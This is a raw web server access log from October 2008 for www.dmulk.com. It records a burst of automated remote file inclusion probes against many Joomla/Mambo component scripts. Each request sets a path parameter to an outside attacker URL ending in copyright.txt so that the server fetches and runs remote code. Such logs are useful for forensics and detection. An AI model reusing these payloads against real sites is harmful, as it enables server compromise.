213.250.2.28 - - [23/Oct/2008:09:13:37 -0700] "GET /logs/access_080530.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:37 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:37 -0700] "GET /logs/access_080530.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:37 -0700] "GET /logs/access_080606.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:37 -0700] "GET /logs/access_080606.log%20%20//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:37 -0700] "GET /logs/access_080530.log%20%20//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:37 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:37 -0700] "GET /logs/access_080603.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 200 70452 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log%20%20//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080606.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080606.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080603.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080606.log//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log%20%20//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080606.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080603.log%20%20//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080530.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:38 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080606.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:38 -0700] "GET /logs/access_080606.log%20%20//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log%20%20//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080603.log%20%20//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080606.log//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080606.log//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080606.log%20%20//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log%20%20//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 200 70452 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080603.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080606.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080606.log//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080606.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080530.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:39 -0700] "GET /logs/access_080603.log%20%20//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:39 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log%20%20//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log%20%20//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080603.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080603.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log%20%20//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080606.log//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:40 -0700] "GET /logs/access_080530.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:40 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080603.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
